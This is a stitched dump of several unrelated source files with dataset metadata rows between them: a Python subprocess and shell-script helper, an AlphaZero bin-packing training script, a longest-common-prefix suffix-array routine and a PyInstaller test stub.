output = __convert__(p.stdout.readlines(), return_format=return_format)
if return_format == "string" and output == "":
output = __convert__(p.stderr.readlines(), return_format=return_format)
elif return_format == "array" and output == []:
output = __convert__(p.stderr.readlines(), return_format=return_format)
return output
# execute a shell script.
def __execute_script__(
# the script in string.
script="",
# wait till the command is pinished.
wait=False,
# the commands timeout, [timeout] overwrites parameter [wait].
timeout=None,
# the commands output return format: string / array.
return_format="string",
# the subprocess.Popen.shell argument.
shell=False,
# pass a input string to the process.
input=None,
):
path = f"/tmp/shell_script.{__generate_pincode__(characters=32)}.sh"
with open(str(path), "w") as file:
file.write(str(script))
os.system(f"chmod +x {path}")
output = __execute__(
command=[f"sh", f"{path}"],
wait=wait,
timeout=timeout,
return_format=return_format,
shell=shell,
input=input,)
os.system(f"rm -fr {path}")
return output
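# Hedged usage sketch (not part of the original module).
#
#   lines = __execute__(["echo", "hello world"], wait=True)
#   print(lines)   # -> "hello world\n"
#
#   lines = __execute_script__("echo one\necho two", wait=True,
#                              return_format="array")
#   print(lines)   # -> ["one", "two"]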
| 31.508108
| 288
| 0.692057
|
794e5e4e5f63fb77cd2afadace84e70c79fadffd
| 1,066
|
py
|
Python
|
main.py
|
igorpejic/alpha-zero-general
|
fcb3dff17ede2bc69706962daa8a59991e1b6395
|
[
"MIT"
] | null | null | null |
main.py
|
igorpejic/alpha-zero-general
|
fcb3dff17ede2bc69706962daa8a59991e1b6395
|
[
"MIT"
] | null | null | null |
main.py
|
igorpejic/alpha-zero-general
|
fcb3dff17ede2bc69706962daa8a59991e1b6395
|
[
"MIT"
] | null | null | null |
from Coach import Coach
# from othello.pytorch.NNet import NNetWrapper as nn
# from othello.OthelloGame import OthelloGame as Game
# from othello.tensorflow.NNet import NNetWrapper as nn
from binpack.tensorflow.NNet import NNetWrapper as nn
from binpack.BinPackGame import BinPackGame as Game
from utils import *
args = dotdict({
'numIters': 8,
'numEps': 3,
'tempThreshold': 15,
'updateThreshold': 0.6,
'maxlenOfQueue': 200000,
'numMCTSSims': 50,
'arenaCompare': 2,
'cpuct': 1,
'checkpoint': './temp/',
'load_model': False,
'load_folder_file': ('/dev/models/8x100x50','best.pth.tar'),
'numItersForTrainExamplesHistory': 40,
})
if __name__=="__main__":
N_TILES = 8
HEIGHT = 8
WIDTH = 8
g = Game(HEIGHT, WIDTH, N_TILES)
nnet = nn(g)
if args.load_model and False:
nnet.load_checkpoint(args.load_folder_file[0], args.load_folder_file[1])
c = Coach(g, nnet, args)
if args.load_model:
print("Load trainExamples from file")
c.loadTrainExamples()
c.learn()
| 24.790698
| 80
| 0.669794
|
794e5f29c4d556af23e1605ce304a0faa801858f
| 889
|
py
|
Python
|
Extra/lcp.py
|
rampup01/Leetcode
|
8450a95a966ef83b24ffe6450f06ce8de92b3efb
|
[
"MIT"
] | 990
|
2018-06-05T11:49:22.000Z
|
2022-03-31T08:59:17.000Z
|
Extra/lcp.py
|
rampup01/Leetcode
|
8450a95a966ef83b24ffe6450f06ce8de92b3efb
|
[
"MIT"
] | 1
|
2021-11-01T01:29:38.000Z
|
2021-11-01T01:29:38.000Z
|
Extra/lcp.py
|
rampup01/Leetcode
|
8450a95a966ef83b24ffe6450f06ce8de92b3efb
|
[
"MIT"
] | 482
|
2018-06-12T22:16:53.000Z
|
2022-03-29T00:23:29.000Z
|
from suffix_array import SuffixArray
class LCP(object):
def __init__(self, s):
self.s = s
self.lcp_array = []
self.suffix_array = SuffixArray(s)
self.suffix_array.create_suffix_array()
def lcp_w_suffix_str(self):
N = len(self.suffix_array.suffix_array)
array = self.suffix_array.suffix_array
self.lcp_array = [0]*N
inv_suffix = [0]*N
for index in range(N):
inv_suffix[array[index].index] = index
maxLen = 0
for index in range(N):
if inv_suffix[index] == N-1:
maxLen = 0
continue
index_j = array[inv_suffix[index]+1].index
while(index+maxLen < N and index_j+maxLen < N and self.s[index+maxLen] == self.s[index_j+maxLen]):
maxLen += 1
self.lcp_array[inv_suffix[index]] = maxLen
if maxLen > 0:
maxLen -= 1
return self.lcp_array
if __name__ == '__main__':
lcp = LCP("banana")
lcp.lcp_w_suffix_str()
    print(lcp.lcp_array)
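# Hedged note (not part of the original file): for "banana" the sorted
# suffixes are a, ana, anana, banana, na, nana, so a Kasai-style construction
# is expected to print [1, 3, 0, 0, 2, 0]; the exact output depends on the
# SuffixArray implementation imported above.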
| 21.166667
| 101
| 0.685039
|
794e601dee15e42214a3cd408efd0dad6970d9a4
| 609
|
py
|
Python
|
tests/old_suite/basic/pkg1/a.py
|
yoda-vid/pyinstaller
|
419f349dad721a253b19d9c596e251818132d6ba
|
[
"Apache-2.0"
] | 2
|
2017-02-08T22:22:09.000Z
|
2020-10-08T12:28:36.000Z
|
tests/old_suite/basic/pkg1/a.py
|
416426/pyinstaller
|
0f2b2e921433ab5a510c7efdb21d9c1d7cfbc645
|
[
"Apache-2.0"
] | 3
|
2020-04-06T15:48:37.000Z
|
2021-03-23T10:22:21.000Z
|
tests/old_suite/basic/pkg1/a.py
|
416426/pyinstaller
|
0f2b2e921433ab5a510c7efdb21d9c1d7cfbc645
|
[
"Apache-2.0"
] | 4
|
2018-06-04T20:40:37.000Z
|
2020-10-13T22:38:40.000Z
|
#-----------------------------------------------------------------------------
# Copyright (c) 2013-2021, PyInstaller Development Team.
#
# Distributed under the terms of the GNU General Public License (version 2
# or later) with exception for distributing the bootloader.
#
# The full license is in the file COPYING.txt, distributed with this software.
#
# SPDX-License-Identifier: (GPL-2.0-or-later WITH Bootloader-exception)
#-----------------------------------------------------------------------------
""" pkg1.a.py is never imported """
print(" %s" % __doc__)
print(" %s %s" % (__name__, __file__))
| 33.833333
| 78
| 0.538588
|